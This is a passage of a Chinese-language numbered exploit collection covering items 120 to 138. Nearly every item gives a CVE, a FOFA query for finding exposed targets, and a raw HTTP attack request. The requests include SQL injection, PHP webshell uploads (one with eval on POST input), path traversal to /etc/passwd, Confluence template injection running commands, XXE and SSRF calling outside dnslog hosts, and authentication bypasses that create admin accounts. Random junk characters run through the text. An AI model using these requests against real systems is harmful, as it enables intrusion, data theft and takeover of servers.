1 {/ N9 Y- Q. t. n9 ]$ ?" CContent-Type: application/x-www-form-urlencoded;6 h- _, N/ D7 P% y
Content-Length: 109
5 h9 F9 M9 F$ N$ }! iOrigin: https://58.18.133.60:84438 e+ C. r) {6 D
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php4 H3 u. o `! s3 V
Sec-Fetch-Dest: empty
# r$ L1 J+ l* g& X1 H4 ]Sec-Fetch-Mode: cors1 d7 n' F8 [, }$ s% D7 z0 C
Sec-Fetch-Site: same-origin" y" b2 @% u) O/ H1 i5 m
X-Forwarded-For: 1.1.1.1
" `1 z* z! ^7 @0 l- N1 FX-Originating-Ip: 1.1.1.1
$ N- e* E+ m* }X-Remote-Ip: 1.1.1.1) x9 S8 B; H+ f. S. [6 Z
X-Remote-Addr: 1.1.1.1
9 q- n& D) V* `: VTe: trailers+ E; k& z' K/ U! _3 C9 m
Connection: close
0 E+ U! a" ` y# p
5 a7 J# D" M. l a# K2 x9 ksrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456( B- b1 J! t5 U8 G+ I( Z
9 i1 z6 {$ }9 e; v" e; n; Z5 q: t, H* P1 I% Q$ c
120. 北京百绰智能S40管理平台导入web.php任意文件上传3 N; Q% [% F" }. g( U8 j& G$ o
CVE-2024-12536 c% |9 ^! J0 Q) a' i8 }$ G
FOFA:title="Smart管理平台"% S+ n& ?/ e [
POST /useratte/web.php? HTTP/1.13 }, D! _! z9 M9 u0 S2 J; I5 s% i
Host: ip:port
) J; [7 p. l8 i) jCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db# w5 h9 G& O" D( [ O
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko' A0 F$ p( I6 ~, Z5 q2 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 E) m' S4 f' |% q0 w! Z( |& r/ C) ?( c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
4 v7 j, s! v: w( F8 u6 W% V# FAccept-Encoding: gzip, deflate
* F8 U5 @! p- l) o! Z# X0 AContent-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793287 }& {$ \* C% j0 \. c. ?, Q
Content-Length: 597
0 X. t" C9 ]5 c( X5 X/ b* U% dOrigin: https://ip:port
: I4 M# A% I, pReferer: https://ip:port/sysmanage/licence.php5 U- ~, n2 Y& y5 Q( }5 y0 R
Upgrade-Insecure-Requests: 1
' @/ u' H) C/ [9 M( T8 LSec-Fetch-Dest: document1 R/ h# R, w9 E% r: O& ~$ }
Sec-Fetch-Mode: navigate" F& U1 H$ g: d
Sec-Fetch-Site: same-origin* @1 Y- {2 b$ e6 s
Sec-Fetch-User: ?18 q5 i0 n- ~& J: m. ?3 F
Te: trailers; T6 R. \8 ~& f; Q9 m2 i7 b
Connection: close
; `% F! l# R9 O: d
3 Y" d0 w+ c, e5 `' D- ]3 [: O-----------------------------42328904123665875270630079328
0 I- ^) n4 k& K5 O8 fContent-Disposition: form-data; name="file_upload"; filename="2.php"1 u* D3 m5 L4 f4 {( g
Content-Type: application/octet-stream
g4 _! V$ N! ?: \1 o
1 [. C. t2 X1 T0 {4 v<?php phpinfo()?>( D# L$ s m) [/ B& Z
-----------------------------42328904123665875270630079328
* k1 A8 S L2 b# i$ m9 F4 K4 c+ BContent-Disposition: form-data; name="id_type"
, G3 P- q2 H! l& C- e) ]& U* i
' T {1 [5 s8 ]1% f6 d" z" L+ T5 I! [# u/ @+ L, ~5 D
-----------------------------42328904123665875270630079328
) Z: g9 E& l4 ^3 u7 z/ a( \4 FContent-Disposition: form-data; name="1_ck"
: w- O. A( Y D. T2 e" \: U0 e) w' o' o* t. [
1_radhttp8 E( W' r5 B- @
-----------------------------42328904123665875270630079328$ d( w$ J8 D) O4 @
Content-Disposition: form-data; name="mode"
% @0 d! E7 @- O; T. ?
& j/ P' g9 K5 ^2 l# }import
! a' q" Y+ E6 M2 V6 o2 T-----------------------------42328904123665875270630079328
# D+ b6 u1 V: N# S/ w' W7 J+ ?, m% r. V0 ~' E
6 `# v% B2 [8 s文件路径/upload/2.php W' _6 ?$ \8 j& ?. J
( K/ [7 U; ^8 |+ t- k( R, ^4 k
121. 北京百绰智能S42管理平台userattestation.php任意文件上传' j$ K4 E# L- l+ E- n5 S; j% g
CVE-2024-19183 I. [ i5 Z0 D9 R- n' D
FOFA:title="Smart管理平台"- T1 [4 g- a# N4 @3 A
POST /useratte/userattestation.php HTTP/1.1
$ ^ U4 |' \7 {" l0 x( ^) \Host: 192.168.40.130:8443$ D5 D* q2 q! i4 o$ {5 Y. U }
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
7 Z! s/ c, a. H' G3 YUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
" d& @: k6 S/ t2 D; o* v7 y5 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 ?& z! \" Z) ^* @6 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ i" p5 W, D( p/ o6 J5 R2 C( t! XAccept-Encoding: gzip, deflate0 r# o7 M, B2 n4 o
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
6 Y8 b" X) \/ UContent-Length: 592* I* I" [7 n$ h
Origin: https://192.168.40.130:8443
* g& [, ]# z8 H. ]& f7 s% uUpgrade-Insecure-Requests: 1
3 E4 d( q$ d. G0 c; eSec-Fetch-Dest: document
/ V# e* X" Y* x! ^- B0 b. NSec-Fetch-Mode: navigate
: w2 Y1 U, j$ z9 \4 aSec-Fetch-Site: same-origin" M' B* V2 X A' {1 X* |+ K
Sec-Fetch-User: ?1
$ U" G- m( P$ T- a1 Z' J, o0 PTe: trailers
2 n8 o2 x9 L% u+ ]Connection: close
; {, O6 X8 a, s. y' b; S' C( J6 h4 L+ v# I
-----------------------------42328904123665875270630079328
5 |' b/ ]' }, U; C vContent-Disposition: form-data; name="web_img"; filename="1.php"$ N) z2 k4 b! p) W. p4 ?7 Q& W& N6 r
Content-Type: application/octet-stream
* R' `* K! f0 J; b) W& @2 ]7 |
9 a! E1 k2 c7 v+ H/ K<?php phpinfo();?>
- _5 a% F/ i0 ]: j-----------------------------423289041236658752706300793281 O4 ?' {; @, z% Z: l8 k4 u
Content-Disposition: form-data; name="id_type"
+ L% n6 U, \4 _9 ], B" B0 w( W% J6 B+ T+ n
1
) \5 L2 x0 G, @- N, c-----------------------------423289041236658752706300793285 W( }( x8 e- y, p; c" I
Content-Disposition: form-data; name="1_ck"
+ O! H0 E* S" p7 A8 q- i: c& W! T4 L3 P
% F% ~+ r+ g H* l+ L1_radhttp0 I9 A' E! Y: l1 |! E2 V: c
-----------------------------42328904123665875270630079328' A9 T- E. g9 {
Content-Disposition: form-data; name="hidwel"
* T5 k. o, ]& G' S1 i: p
! T9 c3 c3 D1 T& v3 \6 [' iset, D1 o9 z; P/ I+ X" n/ `
-----------------------------423289041236658752706300793289 |. P6 R+ R8 B! Q; @3 m+ o# K
; S: `+ F% }" k, T) g6 x0 E. b5 h
boot/web/upload/weblogo/1.php, `* x% W0 M7 l( N
[" U1 j/ r0 Z: b, H+ ?122. 北京百绰智能s200管理平台/importexport.php sql注入
( p+ ?5 G+ e8 Y) x# N' b! k5 bCVE-2024-27718FOFA:title="Smart管理平台"- L0 }8 L" Z0 T4 V9 k& p0 |1 y/ |
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
* @) t' E: U) B0 E+ l) Z, F4 Q3 aGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.15 N3 \+ P; _- U$ T6 q$ Y5 a7 t
Host: x.x.x.x' L$ k: J; F4 f$ w# \
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
: Y6 g. Q- g0 ^8 u) f' f) WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
7 K+ `3 t* q$ l. JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 a; h; T/ ^8 D+ P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" _7 [" c9 s/ TAccept-Encoding: gzip, deflate, br
! i3 L4 K( n. |, Z! c: |) f# ^$ i! {Upgrade-Insecure-Requests: 13 o) e5 a2 Y- r/ i! x
Sec-Fetch-Dest: document
' D5 W' A, J% u6 @ HSec-Fetch-Mode: navigate
1 F. G0 ?: ^' `5 X5 ISec-Fetch-Site: none, E: J+ H0 \2 q
Sec-Fetch-User: ?1
! i; a7 |. K! \7 @: @Te: trailers
* W* o6 k4 X3 M/ |2 QConnection: close
9 ~$ W% d0 h8 A! _2 p, O6 M% A: E$ J3 O% {- A) g
: h( Q; v7 k6 k% o4 d9 V+ P P
123. Atlassian Confluence 模板注入代码执行; A7 ~ L& U1 C E3 S3 |% m5 |, a
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"/ c3 ~' R' Y. ?$ \+ N+ h' K& ^# g
POST /template/aui/text-inline.vm HTTP/1.1, h6 \! x+ R5 c ^5 W5 ^
Host: localhost:80900 ~, ~* f7 t2 a( w
Accept-Encoding: gzip, deflate, br
( `4 t) g8 j7 Q+ b* h6 |1 sAccept: */*
5 M) w' \5 j$ v$ I* f' a4 a( ]# JAccept-Language: en-US;q=0.9,en;q=0.8
- N- @9 }+ Y- K+ zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
/ x. w# o# `) y7 W& t* l6 }7 PConnection: close
% s8 W- L1 k. [% h' b1 w, ?Content-Type: application/x-www-form-urlencoded$ Y, Y0 O* L. X7 P, q' o2 }7 f
* h# \+ v! b* }5 Q+ s+ P" ilabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&[email protected]@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
$ U! ]; U' Z' e5 t6 Z6 s& m+ t, n* g8 q" A e$ a
! }) Q7 c% Q2 X124. 湖南建研工程质量检测系统任意文件上传
( B4 f+ b& i! I! j4 qFOFA:body="/Content/Theme/Standard/webSite/login.css"
" ^! o: \- A5 z7 RPOST /Scripts/admintool?type=updatefile HTTP/1.1
0 E3 S) D# @* E; g1 OHost: 192.168.40.130:8282* s3 N7 [- s4 V+ n
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) R, ^' w c8 i0 m) ^1 BContent-Length: 72
9 Y; J1 A9 U. P$ p3 xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
# j: L% i' n+ iAccept-Encoding: gzip, deflate, br; N$ }. ^2 q } E- c4 B+ [6 \6 }; H$ c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- @6 x3 F0 p* ~: I0 z1 U( qConnection: close
* k# J3 Y5 t7 r& u$ NContent-Type: application/x-www-form-urlencoded
( v8 Z3 }4 V# h+ G; I) n* z
: y2 V, y0 H" r( t, _ }: AfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
" k5 D. f% C" P3 ~4 q
5 }& o( [+ u& i0 v u: y1 k; @8 D0 o0 ]
http://192.168.40.130:8282/Scripts/abcgcg.aspx
# S- H: r+ W/ I) Q2 T6 x3 @9 o4 h/ C" S# J2 O
125. ConnectWise ScreenConnect身份验证绕过
; W3 }0 M. H9 O" T. E: ]CVE-2024-1709
! w$ z& d6 V. Z( L5 f" oFOFA:icon_hash="-82958153"
. M. B6 s) Y2 o/ V9 ohttps://github.com/watchtowrlabs ... bypass-add-user-poc
9 `% I) h9 b) d4 ]$ ^& C3 T' A: X+ U! T& g
1 _# z& B8 Z3 L& a6 m
使用方法
6 o( j. P/ ^2 Q) w/ f- m' j6 hpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!5 }" B U8 X4 R. K# n
2 e. S) v* o3 }8 x* n
1 n/ w( N! p- D, x; H创建好用户后直接登录后台,可以执行系统命令。
6 j# _6 v8 b' `6 r! X
% H2 Q- d: |1 }126. Aiohttp 路径遍历; d0 {2 V; E z: D1 X+ J5 G! q% @1 [
FOFA:title=="ComfyUI"
4 l6 I% g0 \& NGET /static/../../../../../etc/passwd HTTP/1.1
1 Y& _/ C' `$ C- C- x5 E' [Host: x.x.x.x
7 t# B/ F2 t% l8 |- F8 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 B' ~: t# ]. Q9 X. I2 M* {4 C
Connection: close
$ R8 B: G9 [* q7 a1 ?- l: |Accept: */*$ {# V; S' n1 B2 n: v- l, l- L: p
Accept-Language: en7 E) p2 n$ F1 Y
Accept-Encoding: gzip8 o9 T) W/ M! O% w; u; _2 p
# G- w7 M) i# R$ B: T8 y; W8 w: m* n/ C3 @: I7 P! }
127. 广联达Linkworks DataExchange.ashx XXE
- r' b' f- h% J1 S) j _% J( C \FOFA:body="Services/Identification/login.ashx" * j+ k# Q. g6 r/ X/ ?
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1+ m: K- h( L; U# @" T$ h: l
Host: 192.168.40.130:8888
4 {0 t6 ?3 {9 S) ]% C$ g9 K EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.362 z+ O; c0 l7 | Y$ ?
Content-Length: 415
) v( O# c! C: |/ S8 o. DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ ?6 \8 C) P+ x g! N" T* k
Accept-Encoding: gzip, deflate
" w* [6 j- O9 Q, c* P! Y' g0 KAccept-Language: zh-CN,zh;q=0.9
- d9 P1 A" v" e* j" N" J) DConnection: close5 d4 F; w* l3 ~2 B* y
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0. Q: x/ \- ~+ q9 r" u. q0 G" `7 _
Purpose: prefetch' \0 q1 B, k/ X$ s" h
Sec-Purpose: prefetch;prerender1 }$ K% D; {' d/ V1 |4 v
/ B; N& P- i! \; K
------WebKitFormBoundaryJGgV5l5ta05yAIe0; h& d6 \* L) n% {7 M
Content-Disposition: form-data;name="SystemName"
( I& w, e6 O( b2 R' |$ P* r3 l8 Q/ i, R6 H
BIM
2 f3 v0 ]# F, L: U! B------WebKitFormBoundaryJGgV5l5ta05yAIe09 ~. G* F+ [1 }# F7 B: R c
Content-Disposition: form-data;name="Params"
1 J3 S/ s n2 W! gContent-Type: text/plain/ L ~$ {6 r6 G+ ~0 Y" C
% X0 s. o% b8 J# l
<?xml version="1.0" encoding="UTF-8"?>+ Z. n8 O# y5 }7 i) q
<!DOCTYPE test [
# I9 a' m1 {2 d# L5 c<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
4 I0 n& _$ S$ j" W]
2 |6 u) \% U$ F: E1 g>8 \+ Z: K2 [ t" }& c
<test>&t;</test>
6 q+ Z: i) d4 Y0 J* ]# s------WebKitFormBoundaryJGgV5l5ta05yAIe0--( C! u' p& r, I' c# b/ A
/ y. I) O( W8 a: r0 n
& {5 D5 P+ p' g$ r3 f& d0 l/ X
[# V7 a& _6 I$ [128. Adobe ColdFusion 反序列化
5 [; E* t7 c: Q6 J9 g& l6 iCVE-2023-38203
7 l8 i( J) _6 p" Y' \, kAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本). H/ m# j8 x( y! [$ V8 n
FOFA:app="Adobe-ColdFusion"; T4 z1 @5 \8 `0 [" A
PAYLOAD% G/ X$ L& T- N# O# h& M
8 \$ {4 a0 D) _129. Adobe ColdFusion 任意文件读取
- \0 c$ c+ z4 p! c) t/ h' @CVE-2024-20767
2 E4 Y; {; J- e5 GFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request") o! q, S3 t8 d6 |2 i
第一步,获取uuid
; |. r4 [7 N5 e5 VGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1% r6 c3 a }+ g7 t2 i6 N
Host: x.x.x.x
- k. D' b Q4 yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
0 @9 ]! u/ j t7 N% TAccept: */*
4 K [2 R4 u9 R' \8 @( N; W3 ?Accept-Encoding: gzip, deflate
& x! S9 u; Q( ^7 H! b" e$ ?Connection: close
6 R# v: x/ \( u: h7 ~! V
' l, A: B" k, N# w5 \# B G7 y* i- d; e% m1 H" J% `
第二步,读取/etc/passwd文件* i9 f m2 I0 A5 x* l
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
; h# l' ^! u! u: `0 tHost: x.x.x.x7 b, X9 I3 [ @1 k- G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
3 i1 \; D; t# jAccept: */*
" T% @2 ~! H8 L7 j, PAccept-Encoding: gzip, deflate: F7 Y! U; z4 k# K
Connection: close B' T8 `: B \: ~4 `! R f( b @
uuid: 85f60018-a654-4410-a783-f81cbd5000b90 P! l1 {* L5 |
' ~% d2 q: L( T8 a# F, q |: g4 v
: d" _8 |- `7 Q5 m5 p' `
130. Laykefu客服系统任意文件上传5 k' Y! W! D/ z) j' m
FOFA:icon_hash="-334624619"4 S- B' B# Q6 W2 Z' r( U# f( ?
POST /admin/users/upavatar.html HTTP/1.19 ?( n% Q3 R0 Z9 S' k
Host: 127.0.0.1# G, q/ s( h! V2 m
Accept: application/json, text/javascript, */*; q=0.017 x- ]% P" H7 I
X-Requested-With: XMLHttpRequest" t" t3 G, L5 P" v5 q+ i
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26) m# Z! X( n, ?. P+ A* r2 S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
' _6 w, v0 Y. i1 _ vAccept-Encoding: gzip, deflate
! c* E+ h# X( E7 F& f, T' [4 JAccept-Language: zh-CN,zh;q=0.9; D; W: o7 b3 j. ^& t" _
Cookie: user_name=1; user_id=3
( l3 Y q- S& F+ E) |" r% ^; `Connection: close
9 a7 M% _0 d$ Y' N" Q6 ~. v- p9 j2 Y3 S4 N5 ?
------WebKitFormBoundary3OCVBiwBVsNuB2kR
" v! x+ M. A+ j5 t' ?& }$ |# VContent-Disposition: form-data; name="file"; filename="1.php"* ]+ M+ n$ }8 ?2 a
Content-Type: image/png
2 P" ]3 q/ L& e# E: h
! A z. g0 ^1 w' F* M: f8 Q- ]<?php phpinfo();@eval($_POST['sec']);?>* z% i* a' m, u
------WebKitFormBoundary3OCVBiwBVsNuB2kR--
( e6 u8 Z" O+ }" {
$ E$ q% z/ v- F# c' f7 m; v) k/ M4 Q) Y; ~! e: g
131. Mini-Tmall <=20231017 SQL注入
' { B6 @ D! CFOFA:icon_hash="-2087517259"
% T1 e; \: [" T, e: h6 B4 C) R后台地址:http://localhost:8080/tmall/admin
8 T. K# w9 l) |; M/ T+ G4 X- ohttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
* {3 `& s( j6 s; n5 V, j* @! w
/ ]! V+ G, A5 C132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过/ Z1 C8 x2 e; d3 P" r8 o
CVE-2024-27198/ F3 J, q4 b9 G/ T
FOFA:body="Log in to TeamCity"
- g, A7 I Q& L# M s. T- ~POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
( z) E4 p2 w7 b8 Q& xHost: 192.168.40.130:8111
& [% m1 [: A. a6 w0 j* m3 A# z: qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36- R1 q. ]9 B$ L+ I" J
Accept: */*! p' ?, F# S/ _& e
Content-Type: application/json1 E- M6 S6 R D
Accept-Encoding: gzip, deflate
" x# ?4 u1 k/ I* n8 W3 ?' W' H6 S. _& I% n
{"username": "用户名", "password": "密码", "email": "[email protected]", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}) s6 \# |# J8 v; Y' s ]# V
* [; O: s& C6 G2 Z6 J; r+ {
6 a/ s& ]# ~2 Z7 K7 n/ A
CVE-2024-27199
! q6 I5 k0 {4 _% J+ p- Q6 i/res/../admin/diagnostic.jsp# p6 c( ?7 p0 i+ Y
/.well-known/acme-challenge/../../admin/diagnostic.jsp# X( F! U: K- s1 S$ i+ _, T7 ^3 E
/update/../admin/diagnostic.jsp) b3 S7 `; @2 H1 `+ R! q1 G
9 K) e* T# Z, _6 Z# U
, S6 H3 M# E8 v. F l$ T- lCVE-2024-27198-RCE.py
$ l1 v9 u9 [: b$ V4 t/ M: g4 v
" e! u7 ~7 Z; ^. R. G0 v# `133. H5 云商城 file.php 文件上传
8 [5 S0 P7 m/ T4 F% aFOFA:body="/public/qbsp.php"! t+ G9 B7 ?2 o7 b! n8 }
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
) E, H5 J( u9 g0 d- NHost: your-ip: f5 i8 R$ P7 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# Y# I9 X, l: K
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx+ R' M- A; q/ o r# u+ f0 q
/ D+ c q( x0 ]6 P. b5 o
------WebKitFormBoundaryFQqYtrIWb8iBxUCx( `' Z, [. g6 P$ K
Content-Disposition: form-data; name="file"; filename="rce.php"7 v* T, j# k5 P2 p
Content-Type: application/octet-stream8 t+ f3 M) ? V( e: B" c
2 F5 }# a U/ }, s<?php system("cat /etc/passwd");unlink(__FILE__);?>
2 t# t& C+ I7 ~------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
$ {9 T" Q! z+ z. t- i( P! p' y' A8 Q' K/ R
5 G+ D9 u* }: c* q) b) U# e# M1 F, A$ v$ n8 C3 `" v( n* X
134. 网康NS-ASG应用安全网关index.php sql注入$ C% y+ \* ]+ X0 q' E# {; c1 r
CVE-2024-2330
* Z4 m9 `5 k/ ?4 w' ^5 u* dNetentsec NS-ASG Application Security Gateway 6.3版本4 V& J$ }' k8 F5 [; ^/ K
FOFA:app="网康科技-NS-ASG安全网关"/ x3 a, d* ^& F& T/ m4 |$ }
POST /protocol/index.php HTTP/1.12 j C9 v E, x- [
Host: x.x.x.x
: i1 R7 n) s2 a v9 A8 N0 ^Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
5 I& w8 z# m* Q% }2 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0$ r. R5 p) A7 f. d
Accept: */*
, z6 L H W/ e% kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& ]1 Y+ H1 Z% m3 o' f# \' ^Accept-Encoding: gzip, deflate5 ?7 ~/ b% h) f* u' ^0 R5 _
Sec-Fetch-Dest: empty: k: E, U4 j) z. t
Sec-Fetch-Mode: cors
0 ^9 r0 M6 {$ b4 PSec-Fetch-Site: same-origin) f* z! h5 y2 N( }
Te: trailers
! k7 H+ C+ y4 G7 k; a/ q0 Y1 oConnection: close
6 f' m0 E) I9 \ ^Content-Type: application/x-www-form-urlencoded
; ~" ^) J: c1 _5 oContent-Length: 263( a8 i1 B+ [' \/ P' R/ t- {, g& h* v& @
( \/ n$ f8 E" I$ x6 S+ \. kjsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}2 ?' F: q$ o! e" z
1 S; g* G7 s# J& O+ W" p- l5 Y$ i
( V7 T0 t5 B- c- l& f3 }- I. i% y135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
& K5 \8 I, z) L$ sCVE-2024-2022
9 f! o7 N9 ?6 u: A+ ?4 ]- ZNetentsec NS-ASG Application Security Gateway 6.3版本& ^; R- {) v' t; I/ d+ f
FOFA:app="网康科技-NS-ASG安全网关"
( |2 p3 t" q" QGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
( x' w/ Y) l) m5 jHost: x.x.x.x) O, D0 V$ B& B# q& G6 a4 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 w2 J F) H* | U6 HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 [$ y9 ^/ C; X$ G7 hAccept-Encoding: gzip, deflate
+ v! I/ }. E4 K$ T3 sAccept-Language: zh-CN,zh;q=0.9
( T! o; E. v; [& ?: VConnection: close
5 a* q- W* G' c( U8 l
* j& t8 ], D$ ^* R8 u9 e" E4 E/ C' ]: b
136. NextChat cors SSRF
( c& c! A3 n1 KCVE-2023-49785
7 Y( ~9 k# |0 h+ v+ yFOFA:title="NextChat"
) P; e4 |/ F+ B9 t0 n/ C( ]" t/ @. DGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.13 I) }( B# p! o) r* n, v
Host: x.x.x.x:100007 k( z/ A2 ?- j* Z* R: Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 t) F R& t. R' m1 J6 _
Connection: close! d0 k: b& I! e" z% V% Y4 | k
Accept: */*
. o' q. D8 l+ n/ X# z( BAccept-Language: en" n' g6 J( s8 l L& {: [4 U
Accept-Encoding: gzip
8 w& ~% @8 x: z, E N5 c! p, w- f7 [& P9 b" t9 X/ W! w% F
+ e: t3 c, f. [7 S" ]4 d' [
137. 福建科立迅通信指挥调度平台down_file.php sql注入* N+ t( J/ C5 P% R: F% d
CVE-2024-2620
. f" h3 z% ~+ w( i; dFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
5 E! @: R2 z; K1 hGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
3 y4 g, S" `8 F; [# C% y) K& EHost: x.x.x.x @/ ?& d5 X4 C$ L- n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.02 P) p. e. C5 m0 T1 J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ v8 l" U, Y4 q) P3 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: {8 [8 D! B; F, i- \8 JAccept-Encoding: gzip, deflate, br" K5 Q6 s q- Q9 B" ?3 I" f/ w$ K ^
Connection: close
: R% c0 i4 c JCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj, K* h3 t/ B$ R7 Z( M0 K
Upgrade-Insecure-Requests: 1
& t T3 g8 t$ ]4 v6 N) j0 M: ]2 r Y+ k- R% W5 j
) }" v) X4 v2 ]5 `9 ]! w* }
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入% ^* y, u# U5 n, w N
CVE-2024-2621
( o' F5 m$ V- U- mFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"! q, G, A7 y3 e% o+ h
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1* W1 O/ l: T+ j& H3 [
Host: x.x.x.x
; `( a2 N( `1 A$ o/ T6 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0+ P c! M/ W" [$ N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
